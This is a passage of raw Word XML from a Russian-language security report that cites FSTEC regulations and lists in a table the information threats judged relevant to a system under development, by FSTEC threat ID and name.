            <w:tcW w:w="2680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B9C7436"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Имеет знания о сети, возможные оставшиеся учетные данные</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C22F336"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Средняя</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2102" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43D95647" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="0047171E"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47171E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>В3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53D3E238" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="0047171E" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-284" w:right="57" w:firstLine="284"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="029A6E97" w14:textId="1C04D804" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006632BF">
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Согласно Федеральному закону Российской Федерации "О защите информации" № 149-ФЗ и перечню угроз безопасности информации который определяет приказ ФСТЭК России № 17 от 11 февраля 2013 года "Об утверждении Требований о защите информации, не составляющей </w:t>
      </w:r>
      <w:r w:rsidRPr="006632BF">
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>государственную тайну, содержащейся в государственных информационных системах" [</w:t>
      </w:r>
      <w:r w:rsidR="00AA70B6">
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="006632BF">
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>], все основные угрозы находятся в банке данных угроз безопасности информации ФСТЭК</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006632BF">
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00AA70B6">
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="006632BF">
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">]. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В ходе его анализа было установлено, что для разрабатываемой системы являются актуальными только информационные угрозы.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC1E70">
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В таблице 2 показаны угрозы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79914E13" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="000249F9" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="566D2A16" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00512D96">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Таблица 2 – Информационные угрозы</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9629" w:type="dxa"/>
        <w:tblInd w:w="5" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1691"/>
        <w:gridCol w:w="7938"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A1278" w:rsidRPr="0045731F" w14:paraId="5203C178" w14:textId="77777777" w:rsidTr="009D5D3A">
        <w:trPr>
          <w:trHeight w:val="1004"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20821992"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bookmarkStart w:id="7" w:name="_Hlk216364411"/>
            <w:r w:rsidRPr="0045731F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Номер угрозы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A1BA7DE"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Наименование угрозы</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A1278" w:rsidRPr="0045731F" w14:paraId="186F349C" w14:textId="77777777" w:rsidTr="009D5D3A">
        <w:trPr>
          <w:trHeight w:val="409"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C363302" w14:textId="3787D276" w:rsidR="005A1278" w:rsidRPr="005A1278" w:rsidRDefault="005A1278" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="cente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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="664FA4B9" w14:textId="5ABA5DB4" w:rsidR="005A1278" w:rsidRPr="005A1278" w:rsidRDefault="005A1278" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="cente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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A1278" w:rsidRPr="0045731F" w14:paraId="7C68D401" w14:textId="77777777" w:rsidTr="009D5D3A">
        <w:trPr>
          <w:trHeight w:val="1138"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3463C6B8"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УБИ.006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72CB4D7E"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внедрения кода или данных (инъекции, эксплойты)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A1278" w:rsidRPr="0045731F" w14:paraId="3ABA77C8" w14:textId="77777777" w:rsidTr="009D5D3A">
        <w:trPr>
          <w:trHeight w:val="700"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20CA5526"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УБИ.041</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D316348"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 xml:space="preserve">Угроза межсайтового </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0045731F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>скриптинга</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0045731F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A1278" w:rsidRPr="0045731F" w14:paraId="431E0A74" w14:textId="77777777" w:rsidTr="009D5D3A">
        <w:trPr>
          <w:trHeight w:val="782"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60C1197A"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УБИ.042</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AFB3B47"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межсайтовой подделки запроса (CSRF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A1278" w:rsidRPr="0045731F" w14:paraId="5C92D204" w14:textId="77777777" w:rsidTr="009D5D3A">
        <w:trPr>
          <w:trHeight w:val="978"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4860726C"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УБИ.067</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3712855B"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неправомерного ознакомления с защищаемой информацией (утечка)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A1278" w:rsidRPr="0045731F" w14:paraId="715436C3" w14:textId="77777777" w:rsidTr="009D5D3A">
        <w:trPr>
          <w:trHeight w:val="849"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34D5C472"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УБИ.100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07DE2C40"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обхода некорректно настроенных механизмов аутентификации</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A1278" w:rsidRPr="0045731F" w14:paraId="1D4A1AD9" w14:textId="77777777" w:rsidTr="009D5D3A">
        <w:trPr>
          <w:trHeight w:val="722"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F674C47"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УБИ.116</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28E611EB"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перехвата данных, передаваемых по сети</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A1278" w:rsidRPr="0045731F" w14:paraId="222BBC9F" w14:textId="77777777" w:rsidTr="009D5D3A">
        <w:trPr>
          <w:trHeight w:val="563"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B8406E1"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УБИ.122</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2308C2F3"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повышения привилегий</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A1278" w:rsidRPr="0045731F" w14:paraId="3DB7DAD0" w14:textId="77777777" w:rsidTr="009D5D3A">
        <w:trPr>
          <w:trHeight w:val="699"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="466AB29D"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УБИ.131</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06531E23"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подмены субъекта сетевого доступа (спуфинг)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="7"/>
      <w:tr w:rsidR="005A1278" w:rsidRPr="0045731F" w14:paraId="1A04F79F" w14:textId="77777777" w:rsidTr="009D5D3A">
        <w:trPr>
          <w:trHeight w:val="1500"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AF8F285"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УБИ.140</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B7CB3A8"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приведения системы в состояние «отказ в обслуживании» (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0045731F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>DDoS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0045731F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A1278" w:rsidRPr="0045731F" w14:paraId="49CF7E2A" w14:textId="77777777" w:rsidTr="009D5D3A">
        <w:trPr>
          <w:trHeight w:val="1127"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43BA3A70"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УБИ.153</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F73C2DD" w14:textId="77777777" w:rsidR="005A1278"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 xml:space="preserve">Угроза усиления воздействия через сторонние серверы (ботнеты, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0045731F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>криптоджекинг</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0045731F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A60ACBC" w14:textId="4A80BFC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p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CF1147D" w14:textId="50EA8718" w:rsidR="0095287B" w:rsidRPr="0095287B" w:rsidRDefault="0095287B" w:rsidP="00512D96">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Hlk216364443"/>
      <w:r w:rsidRPr="0095287B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Продолжение таблицы </w:t>
      </w:r>
      <w:r w:rsidR="0088347F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9634" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1696"/>
        <w:gridCol w:w="7938"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A1278" w:rsidRPr="0045731F" w14:paraId="46A4465C" w14:textId="77777777" w:rsidTr="009D5D3A">
        <w:trPr>
          <w:trHeight w:val="468"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
